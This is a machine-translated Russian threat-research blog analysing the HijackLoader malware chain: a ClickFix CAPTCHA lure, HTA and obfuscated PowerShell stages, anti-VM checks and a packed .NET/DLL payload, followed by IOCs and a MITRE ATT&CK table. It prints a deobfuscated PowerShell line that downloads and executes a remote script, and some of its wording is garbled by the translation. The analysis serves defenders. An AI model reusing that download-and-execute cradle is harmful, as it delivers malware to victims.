Содержание
- Введение
-
- Растущая угроза атак со стороны загрузчиков
-
- Цель этого блога
- Техническая методология и анализ
-
- Первоначальный доступ и социальная инженерия
-
- Многоступенчатая обфускация и деобфускация
-
- Методы антианализа
-
- Последняя полезная нагрузка
- Заключение
- МНК
- Быстрое заживление Seqrite Protection
- MITRE ATT&CK Картографирование
Введение
С развитием киберугроз окончательное выполнение вредоносной нагрузки перестало быть единственной задачей индустрии кибербезопасности. Загрузчики атак стали критически важным элементом современных атак, служа основным вектором начального доступа и обеспечивая скрытую доставку сложного вредоносного ПО в организацию. В отличие от простых полезных нагрузок, загрузчики разрабатываются с конкретной целью: обойти средства защиты, обеспечить устойчивость и создать благоприятную среду для скрытого выполнения вредоносного ПО финальной стадии. Это делает их более значимой и актуальной угрозой, требующей целенаправленного анализа.
В последнее время мы наблюдаем всплеск HijackLoader Вредоносное ПО. Оно первое появившийся во второй половине 2023 года и быстро получила Внимание к нему привлекла его способность доставлять полезные грузы и интересные методы их загрузки и запуска. В основном он выглядит как Вредоносное ПО как услуга, Который был наблюдается в основном в финансово мотивированных кампаниях по всему миру.
HijackLoader распространяется через поддельные установщики, отравленные SEO веб-сайты, вредоносная реклама и пиратское программное обеспечение/порталы фильмов, что обеспечивает широкую и адаптивную базу жертв.
С июня 2025 года мы наблюдали, как злоумышленники использовали Clickfix, побуждая ничего не подозревающих жертв загружать вредоносные MSI-установщики, что, в свою очередь, приводило к запуску HijackLoader. В результате на компьютер жертвы был загружен DeerStealer в качестве конечного исполняемого файла.
Недавно было также замечено, что TAG-150 появился вместе с CastleLoader/CastleBot, а также использовал внешние сервисы, такие как HijackLoader, как часть своей более широкой экосистемы «вредоносное ПО как услуга».
HijackLoader часто доставляет воры и крысы Постоянно совершенствуя своё мастерство. Он особенно известен своими передовыми методами уклонения от атак, такими как:
- Процесс дублирования с транзакционными разделами
- Отсоединение системных DLL-библиотек
- Прямые системные вызовы в WOW64
- Подмена стека вызовов
- Анти-ВМ проверки
С момента своего обнаружения HijackLoader постоянно развивается, представляя постоянную и растущую угрозу для различных отраслей. Поэтому организациям крайне важно организовать и поддерживать постоянный мониторинг таких загрузчиков, чтобы снизить риск сложных многоэтапных атак.
Цепочка заражения

Технический обзор
Первоначальный доступ начинается с Фишинговая кампания социальной инженерии на основе CAPTCHA, которую мы идентифицировали как Clickfix (данная техника также использовалась злоумышленниками в июне 2025 года).


Этот файл HTA служит начальным загрузчиком, приводящим к выполнению файла PowerShell.

После декодирования приведенной выше строки, закодированной в формате Base64, мы получили еще один скрипт PowerShell, показанный ниже.

Приведённый выше декодированный скрипт PowerShell сильно запутан, что представляет серьёзную проблему для статического анализа и обнаружения на основе сигнатур. Вместо использования читаемых строк и переменных он динамически формирует команды и значения посредством сложных математических операций и реконструкции строк из символьных массивов.
При разрешении вышеуказанной полезной нагрузки мы видим, что она декодируется в приведенную ниже команду, которая, хотя и остается нечитаемой, может быть полностью деобфусцирована.

После полной деобфускации мы видим, что скрипт пытается подключиться к URL-адресу для загрузки последующего файла.
iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))
При запуске в отладчике этот скрипт возвращает ошибку, указывающую на невозможность подключения к URL-адресу.

Файл samie-bower.mp3 — еще один скрипт PowerShell, состоящий из более чем 18,000 XNUMX строк, который сильно запутан и представляет собой следующий этап загрузчика.

В процессе отладки мы видим, что этот файл PowerShell выполняет многочисленные Анти-ВМ проверки, включая проверку количества запущенных процессов и внесение изменений в ключи реестра.

Эти проверки, по-видимому, специально нацелены и считывают Идентификаторы VirtualBox чтобы определить, запущен ли скрипт в виртуализированной среде.
При анализе скрипта мы заметили, что окончательная полезная нагрузка находится в последних нескольких строках, где первоначальный обфусцированный загрузчик доставляет окончательную вредоносную команду.

Вышеуказанное бессмысленное объявление переменной было исправлено: при выполнении оно выполняет декодирование Base64, операции XOR и дополнительные процедуры дешифрования, прежде чем загрузить другой скрипт PowerShell, который, вероятно, внедряет PE-файл.


Расшифровка этого файла обнаруживает встроенный PE-файл, идентифицируемый по его Заголовок MZ.

Этот PE-файл очень плотно упакован. исполняемый файл .NET.

Исполняемая полезная нагрузка загружает значительный объем кода, вероятно, извлеченного из раздела ресурсов.

После распаковки исполняемый файл, по-видимому, загружает DLL-файл.

Этот DLL-файл также защищен, что, вероятно, предотвращает обратную разработку и анализ.

HijackLoader Имеет историю использования многоэтапного процесса, включающего исполняемый файл и библиотеку DLL. На этом последнем этапе загрузчик пытается подключиться к серверу C2, с которого вредоносное ПО загружается. В этом случае вредоносная программа пытается подключиться к URL-адресу, указанному ниже.

Хотя этот C2 больше не доступен, попытка подключения соответствует поведению Вредоносное ПО NekoStealer. Этот HijackLoader участвовал в загрузке различных вредоносных программ-кральщиков, включая Lumma.
Заключение
Для успешной защиты от сложных загрузчиков, таких как HijackLoader, необходимо сместить акцент со статичных, финальных полезных нагрузок на их динамические и постоянно развивающиеся механизмы доставки. Сосредоточившись на обнаружении начального доступа и промежуточных этапов обфускации, организации могут создать более устойчивую защиту от этой устойчивой угрозы. Не менее важно применять проактивный подход на всех уровнях, а не сосредотачиваться исключительно на начальном доступе или финальной полезной нагрузке. Именно на промежуточных уровнях злоумышленники часто вносят наиболее существенные изменения, способствуя успешному развертыванию вредоносного ПО.
МНК:
- 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57
- 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4
- 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df
- 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d
- 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184
- e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82
- 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd
- c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e
- D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
- 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee
- hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta
- 91 [.] 212 [.] 166 [.] 51
- 37[.]27[.]165[.]65:1477
- cosi[.]com[.]ar
- hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3
- hxxp[:]//77[.]91[.]101[.]66/
Быстрое заживление Seqrite Степень защиты:
- Script.Trojan.49900.GC
- Loader.StealerDropperCiR
- Trojan.InfoStealerCiR
- Trojan.Agent
- БДС/511
MITRE Att&ck:
| тактика | Идентификатор техники | Название техники |
| Первоначальный доступ | T1566.002 | Фишинг: фишинговая ссылка (фишинговая страница CAPTCHA) |
| T1189 | Несанкционированная компрометация (вредоносная реклама, отравление SEO, поддельные установщики) | |
| Типы | T1059.001 | Интерпретатор команд и сценариев: PowerShell |
| Уклонение от защиты | T1027 | Запутанные файлы или информация (многоэтапные запутанные скрипты) |
| T1140 | Деобфускация/декодирование файлов или информации (Base64, XOR-декодирование) | |
| T1562.001 | Ослабление защиты: отключение или изменение инструментов (отключение DLL) | |
| T1070.004 | Удаление индикатора: удаление файла (вероятно, используется в промежуточных загрузчиках) | |
| T1211 | Эксплуатация для обхода защиты (прямые системные вызовы в WOW64) | |
| T1036 | Маскарадинг (поддельные расширения типа .mp3 для скриптов PowerShell) | |
| Дискавери | T1082 | Обнаружение системной информации (проверки виртуальных машин, запросы к реестру) |
| T1497.001 | Обход виртуализации/песочницы: проверка системы | |
| Настойчивость | T1547.001 | Выполнение автозапуска при загрузке или входе в систему: ключи запуска реестра (внесение изменений в реестр) |
| Сохранение/Отмена привилегий. | T1055 | Процесс инъекции (процедуры инъекции ПЭ) |
| Управление и контроль (C2) | T1071.001 | Протокол прикладного уровня: веб-протоколы (трафик HTTP/HTTPS C2) |
| T1105 | Передача инструмента Ingress (загрузка дополнительных полезных данных) | |
| Воздействие / Сбор | Т1056 / Т1005 | Захват входных данных / Данные из локальной системы (функция кражи информации из конечной полезной нагрузки) |
Авторы:
Нирадж Лазарус Макасаре
Шрутирупа Банерджи



